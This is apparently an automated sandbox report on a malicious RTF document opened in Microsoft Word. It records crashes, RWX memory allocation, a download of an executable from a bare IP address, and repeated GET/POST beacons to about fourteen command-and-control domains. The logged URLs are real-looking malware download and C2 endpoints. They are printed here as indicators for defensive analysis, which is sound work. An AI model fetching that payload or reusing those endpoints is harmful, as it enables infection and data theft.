Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6402	April 13, 2021, 9:13 a.m.	April 13, 2021, 9:21 a.m.

Size	8.7KB
Type	Rich Text Format data, unknown version
MD5	`e70135cdb555ce99adee7df642813dcb`
SHA256	`8fd53e5f78693bc7639c94ef4a7969c5395c4e90ae255c0080f687811c8339e6`
CRC32	`71D3C636`
ssdeep	`192:v+5wk2b/9LmQCx4ZesrJHUf9i5Lt8cAKIG4BrNAorM:Giz9aQCC3tD+5AoA`
Yara	Rich_Text_Format_Zero - Rich Text Format Signature Zero

WINWORD.EXE "C:\Program Files (x86)\Microsoft Office\Office12\WINWORD.EXE" C:\Users\test22\AppData\Local\Temp\.............................................................dot
3332

Name	Response	Post-Analysis Lookup
www.vr-club.site	A 163.44.185.224	163.44.185.224
www.vegrebel.com	CNAME vegrebel.com A 50.87.195.61	50.87.195.61
www.elticrecruit.com	A 216.239.34.21 A 216.239.36.21 A 216.239.38.21 A 216.239.32.21	216.239.34.21
www.clonegrandma.com
www.ueoxx.com	A 52.15.160.167 A 3.13.255.157 CNAME prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com A 3.14.206.30	52.15.160.167
www.ikoyisland.net	CNAME parking.namesilo.com A 188.164.131.200 A 204.188.203.155 A 70.39.125.244 A 209.141.38.71 A 198.251.84.92 A 168.235.88.209 A 64.32.22.102 A 198.251.81.30 A 192.161.187.200 A 45.58.190.82 A 107.161.23.204	107.161.23.204
www.valid8.network	CNAME valid8.network A 182.50.132.242	182.50.132.242
www.sorelaxedmassage.com	CNAME sorelaxedmassage.com.lo910.faipod.com A 103.72.145.203	103.72.145.203
www.ekolucky.com	A 213.32.10.111	213.32.10.111
www.xn--v1bmo9dufsb.com	CNAME xn--v1bmo9dufsb.com A 184.168.131.241	184.168.131.241
www.vinegret.com	A 172.67.189.247 A 104.21.89.165	104.21.89.165
www.scott-re.online	CNAME scott-re.online A 34.102.136.180	34.102.136.180
www.acernoxsas.com	A 172.67.171.149 A 104.21.63.177	104.21.63.177
www.7985699.com	A 45.142.156.44 CNAME k9cdna.51w4.com	45.142.156.44
www.elpis-catering.com	CNAME elpis-catering.com A 67.225.129.56	67.225.129.56

IP Address	Status	Action
103.72.145.203	Active	Moloch
104.21.63.177	Active	Moloch
104.21.89.165	Active	Moloch
163.44.185.224	Active	Moloch
164.124.101.2	Active	Moloch
172.217.25.14	Active	Moloch
182.50.132.242	Active	Moloch
184.168.131.241	Active	Moloch
188.164.131.200	Active	Moloch
213.32.10.111	Active	Moloch
216.239.36.21	Active	Moloch
23.95.122.25	Active	Moloch
3.13.255.157	Active	Moloch
34.102.136.180	Active	Moloch
45.142.156.44	Active	Moloch
50.87.195.61	Active	Moloch
67.225.129.56	Active	Moloch

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

One or more processes crashed (2 events)

Time & API	Arguments	Status	Return	Repeated
__exception__ April 13, 2021, 9:13 a.m.	stacktrace: RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x74d5374b DllDebugObjectRPCHook+0xb6 HACCEL_UserFree-0x57 ole32+0x13f725 @ 0x74bff725 NdrPointerFree+0x16a IUnknown_Release_Proxy-0x5a rpcrt4+0x3414b @ 0x74d6414b WdtpInterfacePointer_UserUnmarshal+0x166b DllDebugObjectRPCHook-0x2d8d ole32+0x13c8e2 @ 0x74bfc8e2 CoRegisterMessageFilter+0x32b4 ObjectStublessClient5-0x1db5 ole32+0x398ad @ 0x74af98ad OleCreateEmbeddingHelper+0x2a1 CreateFileMoniker-0x17de ole32+0x81414 @ 0x74b41414 ObjectStublessClient31+0x6af8 STGMEDIUM_UserUnmarshal-0x22bb6 ole32+0x97b68 @ 0x74b57b68 wdGetApplicationObject+0x131f9 wdCommandDispatch-0x4c476 wwlib+0x394dff @ 0x64e54dff DllCanUnloadNow+0xbaf5e wwlib+0x9692a0 @ 0x654292a0 DllCanUnloadNow+0x339ef0 wwlib+0xbe8232 @ 0x656a8232 DllCanUnloadNow+0x54e0c9 wwlib+0xdfc40b @ 0x658bc40b DllCanUnloadNow+0x55865b wwlib+0xe0699d @ 0x658c699d DllCanUnloadNow+0x33bec4 wwlib+0xbea206 @ 0x656aa206 DllCanUnloadNow+0xbd684 wwlib+0x96b9c6 @ 0x6542b9c6 DllCanUnloadNow+0x215f8 wwlib+0x8cf93a @ 0x6538f93a DllGetClassObject+0x2d9ac DllGetLCID-0x22ded4 wwlib+0x325f6 @ 0x64af25f6 DllGetClassObject+0x5b213 DllGetLCID-0x20066d wwlib+0x5fe5d @ 0x64b1fe5d DllGetClassObject+0x5a904 DllGetLCID-0x200f7c wwlib+0x5f54e @ 0x64b1f54e DllCanUnloadNow+0x3200d6 wwlib+0xbce418 @ 0x6568e418 DllCanUnloadNow+0x2d334c wwlib+0xb8168e @ 0x6564168e DllGetClassObject+0x157e7 DllGetLCID-0x246099 wwlib+0x1a431 @ 0x64ada431 DllGetClassObject+0x3b23 DllGetLCID-0x257d5d wwlib+0x876d @ 0x64ac876d FMain+0x482 DllGetClassObject-0x266 wwlib+0x49e4 @ 0x64ac49e4 wdCommandDispatch-0x2ed winword+0x15d7 @ 0x2f0615d7 wdCommandDispatch-0x367 winword+0x155d @ 0x2f06155d BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727 exception.instruction: leave exception.module: KERNELBASE.dll exception.exception_code: 0x800706be exception.offset: 46887 exception.address: 0x76a7b727 registers.esp: 3689032 registers.edi: 1957755408 registers.eax: 3689032 registers.ebp: 3689112 registers.edx: 0 registers.ebx: 4712380 registers.esi: 2147944126 registers.ecx: 3350582440	1	0	0
__exception__ April 13, 2021, 9:13 a.m.	stacktrace: RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x74d5374b DllDebugObjectRPCHook+0xb6 HACCEL_UserFree-0x57 ole32+0x13f725 @ 0x74bff725 NdrPointerFree+0x16a IUnknown_Release_Proxy-0x5a rpcrt4+0x3414b @ 0x74d6414b WdtpInterfacePointer_UserUnmarshal+0x166b DllDebugObjectRPCHook-0x2d8d ole32+0x13c8e2 @ 0x74bfc8e2 CoRegisterMessageFilter+0x32b4 ObjectStublessClient5-0x1db5 ole32+0x398ad @ 0x74af98ad CoRegisterMessageFilter+0x5048 ObjectStublessClient5-0x21 ole32+0x3b641 @ 0x74afb641 CoRegisterMessageFilter+0x4ff4 ObjectStublessClient5-0x75 ole32+0x3b5ed @ 0x74afb5ed CoRegisterMessageFilter+0x4b79 ObjectStublessClient5-0x4f0 ole32+0x3b172 @ 0x74afb172 CoRegisterMessageFilter+0x4075 ObjectStublessClient5-0xff4 ole32+0x3a66e @ 0x74afa66e ObjectStublessClient31+0x2961c STGMEDIUM_UserUnmarshal-0x92 ole32+0xba68c @ 0x74b7a68c ObjectStublessClient31+0x6776 STGMEDIUM_UserUnmarshal-0x22f38 ole32+0x977e6 @ 0x74b577e6 OleCreateEmbeddingHelper+0x344 CreateFileMoniker-0x173b ole32+0x814b7 @ 0x74b414b7 ObjectStublessClient31+0x6af8 STGMEDIUM_UserUnmarshal-0x22bb6 ole32+0x97b68 @ 0x74b57b68 wdGetApplicationObject+0x131f9 wdCommandDispatch-0x4c476 wwlib+0x394dff @ 0x64e54dff DllCanUnloadNow+0xbaf5e wwlib+0x9692a0 @ 0x654292a0 DllCanUnloadNow+0x339ef0 wwlib+0xbe8232 @ 0x656a8232 DllCanUnloadNow+0x54e0c9 wwlib+0xdfc40b @ 0x658bc40b DllCanUnloadNow+0x55865b wwlib+0xe0699d @ 0x658c699d DllCanUnloadNow+0x33bec4 wwlib+0xbea206 @ 0x656aa206 DllCanUnloadNow+0xbd684 wwlib+0x96b9c6 @ 0x6542b9c6 DllCanUnloadNow+0x215f8 wwlib+0x8cf93a @ 0x6538f93a DllGetClassObject+0x2d9ac DllGetLCID-0x22ded4 wwlib+0x325f6 @ 0x64af25f6 DllGetClassObject+0x5b213 DllGetLCID-0x20066d wwlib+0x5fe5d @ 0x64b1fe5d DllGetClassObject+0x5a904 DllGetLCID-0x200f7c wwlib+0x5f54e @ 0x64b1f54e DllCanUnloadNow+0x3200d6 wwlib+0xbce418 @ 0x6568e418 DllCanUnloadNow+0x2d334c wwlib+0xb8168e @ 0x6564168e DllGetClassObject+0x157e7 DllGetLCID-0x246099 wwlib+0x1a431 @ 0x64ada431 DllGetClassObject+0x3b23 DllGetLCID-0x257d5d wwlib+0x876d @ 0x64ac876d FMain+0x482 DllGetClassObject-0x266 wwlib+0x49e4 @ 0x64ac49e4 wdCommandDispatch-0x2ed winword+0x15d7 @ 0x2f0615d7 wdCommandDispatch-0x367 winword+0x155d @ 0x2f06155d BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727 exception.instruction: leave exception.module: KERNELBASE.dll exception.exception_code: 0x800706ba exception.offset: 46887 exception.address: 0x76a7b727 registers.esp: 3688724 registers.edi: 1957755408 registers.eax: 3688724 registers.ebp: 3688804 registers.edx: 0 registers.ebx: 4711876 registers.esi: 2147944122 registers.ecx: 3350582440	1	0	0

Time & API

Arguments

Status

Return

Repeated

__exception__

April 13, 2021, 9:13 a.m.

stacktrace:

RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x74d5374b
DllDebugObjectRPCHook+0xb6 HACCEL_UserFree-0x57 ole32+0x13f725 @ 0x74bff725
NdrPointerFree+0x16a IUnknown_Release_Proxy-0x5a rpcrt4+0x3414b @ 0x74d6414b
WdtpInterfacePointer_UserUnmarshal+0x166b DllDebugObjectRPCHook-0x2d8d ole32+0x13c8e2 @ 0x74bfc8e2
CoRegisterMessageFilter+0x32b4 ObjectStublessClient5-0x1db5 ole32+0x398ad @ 0x74af98ad
OleCreateEmbeddingHelper+0x2a1 CreateFileMoniker-0x17de ole32+0x81414 @ 0x74b41414
ObjectStublessClient31+0x6af8 STGMEDIUM_UserUnmarshal-0x22bb6 ole32+0x97b68 @ 0x74b57b68
wdGetApplicationObject+0x131f9 wdCommandDispatch-0x4c476 wwlib+0x394dff @ 0x64e54dff
DllCanUnloadNow+0xbaf5e wwlib+0x9692a0 @ 0x654292a0
DllCanUnloadNow+0x339ef0 wwlib+0xbe8232 @ 0x656a8232
DllCanUnloadNow+0x54e0c9 wwlib+0xdfc40b @ 0x658bc40b
DllCanUnloadNow+0x55865b wwlib+0xe0699d @ 0x658c699d
DllCanUnloadNow+0x33bec4 wwlib+0xbea206 @ 0x656aa206
DllCanUnloadNow+0xbd684 wwlib+0x96b9c6 @ 0x6542b9c6
DllCanUnloadNow+0x215f8 wwlib+0x8cf93a @ 0x6538f93a
DllGetClassObject+0x2d9ac DllGetLCID-0x22ded4 wwlib+0x325f6 @ 0x64af25f6
DllGetClassObject+0x5b213 DllGetLCID-0x20066d wwlib+0x5fe5d @ 0x64b1fe5d
DllGetClassObject+0x5a904 DllGetLCID-0x200f7c wwlib+0x5f54e @ 0x64b1f54e
DllCanUnloadNow+0x3200d6 wwlib+0xbce418 @ 0x6568e418
DllCanUnloadNow+0x2d334c wwlib+0xb8168e @ 0x6564168e
DllGetClassObject+0x157e7 DllGetLCID-0x246099 wwlib+0x1a431 @ 0x64ada431
DllGetClassObject+0x3b23 DllGetLCID-0x257d5d wwlib+0x876d @ 0x64ac876d
FMain+0x482 DllGetClassObject-0x266 wwlib+0x49e4 @ 0x64ac49e4
wdCommandDispatch-0x2ed winword+0x15d7 @ 0x2f0615d7
wdCommandDispatch-0x367 winword+0x155d @ 0x2f06155d
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5

exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b
exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727
exception.instruction: leave
exception.module: KERNELBASE.dll
exception.exception_code: 0x800706be
exception.offset: 46887
exception.address: 0x76a7b727
registers.esp: 3689032
registers.edi: 1957755408
registers.eax: 3689032
registers.ebp: 3689112
registers.edx: 0
registers.ebx: 4712380
registers.esi: 2147944126
registers.ecx: 3350582440

__exception__

April 13, 2021, 9:13 a.m.

stacktrace:

RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x74d5374b
DllDebugObjectRPCHook+0xb6 HACCEL_UserFree-0x57 ole32+0x13f725 @ 0x74bff725
NdrPointerFree+0x16a IUnknown_Release_Proxy-0x5a rpcrt4+0x3414b @ 0x74d6414b
WdtpInterfacePointer_UserUnmarshal+0x166b DllDebugObjectRPCHook-0x2d8d ole32+0x13c8e2 @ 0x74bfc8e2
CoRegisterMessageFilter+0x32b4 ObjectStublessClient5-0x1db5 ole32+0x398ad @ 0x74af98ad
CoRegisterMessageFilter+0x5048 ObjectStublessClient5-0x21 ole32+0x3b641 @ 0x74afb641
CoRegisterMessageFilter+0x4ff4 ObjectStublessClient5-0x75 ole32+0x3b5ed @ 0x74afb5ed
CoRegisterMessageFilter+0x4b79 ObjectStublessClient5-0x4f0 ole32+0x3b172 @ 0x74afb172
CoRegisterMessageFilter+0x4075 ObjectStublessClient5-0xff4 ole32+0x3a66e @ 0x74afa66e
ObjectStublessClient31+0x2961c STGMEDIUM_UserUnmarshal-0x92 ole32+0xba68c @ 0x74b7a68c
ObjectStublessClient31+0x6776 STGMEDIUM_UserUnmarshal-0x22f38 ole32+0x977e6 @ 0x74b577e6
OleCreateEmbeddingHelper+0x344 CreateFileMoniker-0x173b ole32+0x814b7 @ 0x74b414b7
ObjectStublessClient31+0x6af8 STGMEDIUM_UserUnmarshal-0x22bb6 ole32+0x97b68 @ 0x74b57b68
wdGetApplicationObject+0x131f9 wdCommandDispatch-0x4c476 wwlib+0x394dff @ 0x64e54dff
DllCanUnloadNow+0xbaf5e wwlib+0x9692a0 @ 0x654292a0
DllCanUnloadNow+0x339ef0 wwlib+0xbe8232 @ 0x656a8232
DllCanUnloadNow+0x54e0c9 wwlib+0xdfc40b @ 0x658bc40b
DllCanUnloadNow+0x55865b wwlib+0xe0699d @ 0x658c699d
DllCanUnloadNow+0x33bec4 wwlib+0xbea206 @ 0x656aa206
DllCanUnloadNow+0xbd684 wwlib+0x96b9c6 @ 0x6542b9c6
DllCanUnloadNow+0x215f8 wwlib+0x8cf93a @ 0x6538f93a
DllGetClassObject+0x2d9ac DllGetLCID-0x22ded4 wwlib+0x325f6 @ 0x64af25f6
DllGetClassObject+0x5b213 DllGetLCID-0x20066d wwlib+0x5fe5d @ 0x64b1fe5d
DllGetClassObject+0x5a904 DllGetLCID-0x200f7c wwlib+0x5f54e @ 0x64b1f54e
DllCanUnloadNow+0x3200d6 wwlib+0xbce418 @ 0x6568e418
DllCanUnloadNow+0x2d334c wwlib+0xb8168e @ 0x6564168e
DllGetClassObject+0x157e7 DllGetLCID-0x246099 wwlib+0x1a431 @ 0x64ada431
DllGetClassObject+0x3b23 DllGetLCID-0x257d5d wwlib+0x876d @ 0x64ac876d
FMain+0x482 DllGetClassObject-0x266 wwlib+0x49e4 @ 0x64ac49e4
wdCommandDispatch-0x2ed winword+0x15d7 @ 0x2f0615d7
wdCommandDispatch-0x367 winword+0x155d @ 0x2f06155d
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5

exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b
exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727
exception.instruction: leave
exception.module: KERNELBASE.dll
exception.exception_code: 0x800706ba
exception.offset: 46887
exception.address: 0x76a7b727
registers.esp: 3688724
registers.edi: 1957755408
registers.eax: 3688724
registers.ebp: 3688804
registers.edx: 0
registers.ebx: 4711876
registers.esi: 2147944122
registers.ecx: 3350582440

HTTP traffic contains suspicious features which may be indicative of malware related traffic (15 events)

suspicious_features	Connection to IP address	suspicious_request	GET http://23.95.122.25/h/vbc.exe
suspicious_features	GET method with no useragent header	suspicious_request	GET http://www.ueoxx.com/nnmd/?uZi0=tRQiX2tnIcR1+0C/rREkw+oZ8fYp7zrYt8/OoSFyZqkjizznZx3g6RXGoToit+qONbwCpa2o&Vnt4_=GTd0sn7PSL8x7PP
suspicious_features	GET method with no useragent header	suspicious_request	GET http://www.vinegret.com/nnmd/?uZi0=vSTcV67Wsym0gjaMHw+BLsLDF404VwtlM2ZL2+kS2oryP3sG0sNRMddYy5XCOzyR+w1r1rN4&Vnt4_=GTd0sn7PSL8x7PP
suspicious_features	GET method with no useragent header	suspicious_request	GET http://www.valid8.network/nnmd/?uZi0=CGq8FpRO0AiTL86OI7qyWUGcdnK3uFmp3WOqNHKk+zAOrlhHiWtpg/dTztC/+VOwDx9e6LJ8&Vnt4_=GTd0sn7PSL8x7PP
suspicious_features	GET method with no useragent header	suspicious_request	GET http://www.7985699.com/nnmd/?uZi0=5eMcWOIRhRBDg7AFbH6T6n9ePY1bhRzkU2oAA9D0h2F0eFvVxskwV2U654U3C4UMb8hOzpd5&Vnt4_=GTd0sn7PSL8x7PP
suspicious_features	GET method with no useragent header	suspicious_request	GET http://www.acernoxsas.com/nnmd/?uZi0=RIRhBHcBnpQFpzVEdm9Qn3YrBBK1OZbcUKpQDD4XzYml+x0kk9G8REWbCSESFdmiGdYULLFI&Vnt4_=GTd0sn7PSL8x7PP
suspicious_features	GET method with no useragent header	suspicious_request	GET http://www.ekolucky.com/nnmd/?uZi0=2ELq5eNBSeN+85ZFfjQj/2xpbhe81hF7Lx3GgMrXOl3ZzRDKfjz/x0EKuhMKdwtM2WWmtAp6&Vnt4_=GTd0sn7PSL8x7PP
suspicious_features	GET method with no useragent header	suspicious_request	GET http://www.elticrecruit.com/nnmd/?uZi0=kngYRuVfLuuPny+4CliufAMPT2DrkHQGtZ529sxu6AZ+mjDb8TOV5Kb0i+tB46tvYkYEaNVD&Vnt4_=GTd0sn7PSL8x7PP
suspicious_features	GET method with no useragent header	suspicious_request	GET http://www.vr-club.site/nnmd/?uZi0=PWz62rtZjeojhOkFcCqBVXu8rEu/adWxBjkYhVKdUPhCPZNYbrsWWb643PkmL53QhEqlNSfQ&Vnt4_=GTd0sn7PSL8x7PP
suspicious_features	GET method with no useragent header	suspicious_request	GET http://www.scott-re.online/nnmd/?uZi0=YoDjfv9GFAPxmC/m/YrXEnPJINgN/ZGcUJt6czxWwkNRV1BAm2Kb0tXyCx+SX/c+MMPjJ8db&Vnt4_=GTd0sn7PSL8x7PP
suspicious_features	GET method with no useragent header	suspicious_request	GET http://www.ikoyisland.net/nnmd/?uZi0=R5rKQMUlrwVeLoW0iVXTqsebTRUUATzeWiADp6t7RLnxNxiFJigPNlV+Rw7wnrX+JJ9AzRNR&Vnt4_=GTd0sn7PSL8x7PP
suspicious_features	GET method with no useragent header	suspicious_request	GET http://www.vegrebel.com/nnmd/?uZi0=iedGY0/jFY2caMs7ufAPjCijJp09b4Pnd9J45dLvz29YUuAPrQ24EB7QdiStDbxe7UevWaqL&Vnt4_=GTd0sn7PSL8x7PP
suspicious_features	GET method with no useragent header	suspicious_request	GET http://www.elpis-catering.com/nnmd/?uZi0=0Ts1VGxpsMxFhohnYcmQwyVTyV70cpoMLj6MACjr+zVW8ucMOFGWLmSRW6U63/nNCvV4KGuc&Vnt4_=GTd0sn7PSL8x7PP
suspicious_features	GET method with no useragent header	suspicious_request	GET http://www.xn--v1bmo9dufsb.com/nnmd/?uZi0=cDaDwtSEh/5bc2FeeSIiUcUr+mpY/3xbz64LVgZ45maSnMiNTbYqd99xhwdI+uHxijdOlda1&Vnt4_=GTd0sn7PSL8x7PP
suspicious_features	GET method with no useragent header	suspicious_request	GET http://www.sorelaxedmassage.com/nnmd/?uZi0=ZSH2noI6NHAHn9QA8EACxsTwqFhF5NYts9vBJBihuNtX6Je+hj0P0cQ5PSooL6U0A47HLjeU&Vnt4_=GTd0sn7PSL8x7PP

Performs some HTTP requests (29 events)

request	GET http://23.95.122.25/h/vbc.exe
request	POST http://www.ueoxx.com/nnmd/
request	GET http://www.ueoxx.com/nnmd/?uZi0=tRQiX2tnIcR1+0C/rREkw+oZ8fYp7zrYt8/OoSFyZqkjizznZx3g6RXGoToit+qONbwCpa2o&Vnt4_=GTd0sn7PSL8x7PP
request	POST http://www.vinegret.com/nnmd/
request	GET http://www.vinegret.com/nnmd/?uZi0=vSTcV67Wsym0gjaMHw+BLsLDF404VwtlM2ZL2+kS2oryP3sG0sNRMddYy5XCOzyR+w1r1rN4&Vnt4_=GTd0sn7PSL8x7PP
request	POST http://www.valid8.network/nnmd/
request	GET http://www.valid8.network/nnmd/?uZi0=CGq8FpRO0AiTL86OI7qyWUGcdnK3uFmp3WOqNHKk+zAOrlhHiWtpg/dTztC/+VOwDx9e6LJ8&Vnt4_=GTd0sn7PSL8x7PP
request	POST http://www.7985699.com/nnmd/
request	GET http://www.7985699.com/nnmd/?uZi0=5eMcWOIRhRBDg7AFbH6T6n9ePY1bhRzkU2oAA9D0h2F0eFvVxskwV2U654U3C4UMb8hOzpd5&Vnt4_=GTd0sn7PSL8x7PP
request	POST http://www.acernoxsas.com/nnmd/
request	GET http://www.acernoxsas.com/nnmd/?uZi0=RIRhBHcBnpQFpzVEdm9Qn3YrBBK1OZbcUKpQDD4XzYml+x0kk9G8REWbCSESFdmiGdYULLFI&Vnt4_=GTd0sn7PSL8x7PP
request	POST http://www.ekolucky.com/nnmd/
request	GET http://www.ekolucky.com/nnmd/?uZi0=2ELq5eNBSeN+85ZFfjQj/2xpbhe81hF7Lx3GgMrXOl3ZzRDKfjz/x0EKuhMKdwtM2WWmtAp6&Vnt4_=GTd0sn7PSL8x7PP
request	POST http://www.elticrecruit.com/nnmd/
request	GET http://www.elticrecruit.com/nnmd/?uZi0=kngYRuVfLuuPny+4CliufAMPT2DrkHQGtZ529sxu6AZ+mjDb8TOV5Kb0i+tB46tvYkYEaNVD&Vnt4_=GTd0sn7PSL8x7PP
request	POST http://www.vr-club.site/nnmd/
request	GET http://www.vr-club.site/nnmd/?uZi0=PWz62rtZjeojhOkFcCqBVXu8rEu/adWxBjkYhVKdUPhCPZNYbrsWWb643PkmL53QhEqlNSfQ&Vnt4_=GTd0sn7PSL8x7PP
request	POST http://www.scott-re.online/nnmd/
request	GET http://www.scott-re.online/nnmd/?uZi0=YoDjfv9GFAPxmC/m/YrXEnPJINgN/ZGcUJt6czxWwkNRV1BAm2Kb0tXyCx+SX/c+MMPjJ8db&Vnt4_=GTd0sn7PSL8x7PP
request	POST http://www.ikoyisland.net/nnmd/
request	GET http://www.ikoyisland.net/nnmd/?uZi0=R5rKQMUlrwVeLoW0iVXTqsebTRUUATzeWiADp6t7RLnxNxiFJigPNlV+Rw7wnrX+JJ9AzRNR&Vnt4_=GTd0sn7PSL8x7PP
request	POST http://www.vegrebel.com/nnmd/
request	GET http://www.vegrebel.com/nnmd/?uZi0=iedGY0/jFY2caMs7ufAPjCijJp09b4Pnd9J45dLvz29YUuAPrQ24EB7QdiStDbxe7UevWaqL&Vnt4_=GTd0sn7PSL8x7PP
request	POST http://www.elpis-catering.com/nnmd/
request	GET http://www.elpis-catering.com/nnmd/?uZi0=0Ts1VGxpsMxFhohnYcmQwyVTyV70cpoMLj6MACjr+zVW8ucMOFGWLmSRW6U63/nNCvV4KGuc&Vnt4_=GTd0sn7PSL8x7PP
request	POST http://www.xn--v1bmo9dufsb.com/nnmd/
request	GET http://www.xn--v1bmo9dufsb.com/nnmd/?uZi0=cDaDwtSEh/5bc2FeeSIiUcUr+mpY/3xbz64LVgZ45maSnMiNTbYqd99xhwdI+uHxijdOlda1&Vnt4_=GTd0sn7PSL8x7PP
request	POST http://www.sorelaxedmassage.com/nnmd/
request	GET http://www.sorelaxedmassage.com/nnmd/?uZi0=ZSH2noI6NHAHn9QA8EACxsTwqFhF5NYts9vBJBihuNtX6Je+hj0P0cQ5PSooL6U0A47HLjeU&Vnt4_=GTd0sn7PSL8x7PP

Sends data using the HTTP POST Method (14 events)

request	POST http://www.ueoxx.com/nnmd/
request	POST http://www.vinegret.com/nnmd/
request	POST http://www.valid8.network/nnmd/
request	POST http://www.7985699.com/nnmd/
request	POST http://www.acernoxsas.com/nnmd/
request	POST http://www.ekolucky.com/nnmd/
request	POST http://www.elticrecruit.com/nnmd/
request	POST http://www.vr-club.site/nnmd/
request	POST http://www.scott-re.online/nnmd/
request	POST http://www.ikoyisland.net/nnmd/
request	POST http://www.vegrebel.com/nnmd/
request	POST http://www.elpis-catering.com/nnmd/
request	POST http://www.xn--v1bmo9dufsb.com/nnmd/
request	POST http://www.sorelaxedmassage.com/nnmd/

Allocates read-write-execute memory (usually to unpack itself) (9 events)

Time & API	Arguments	Status
NtProtectVirtualMemory April 13, 2021, 9:13 a.m.	process_identifier: 3332 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05fe1000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 13, 2021, 9:13 a.m.	process_identifier: 3332 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x743c1000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 13, 2021, 9:13 a.m.	process_identifier: 3332 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05830000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 13, 2021, 9:13 a.m.	process_identifier: 3332 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05830000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 13, 2021, 9:13 a.m.	process_identifier: 3332 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05840000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 13, 2021, 9:13 a.m.	process_identifier: 3332 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05850000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory April 13, 2021, 9:13 a.m.	process_identifier: 3332 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x70b41000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 13, 2021, 9:13 a.m.	process_identifier: 3332 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x70b44000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 13, 2021, 9:13 a.m.	process_identifier: 3332 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x507c1000 process_handle: 0xffffffff	1

An application raised an exception which may be indicative of an exploit crash (3 events)

Time & API	Arguments	Status	Return	Repeated
Application Crash	Process WINWORD.EXE with pid 3332 crashed
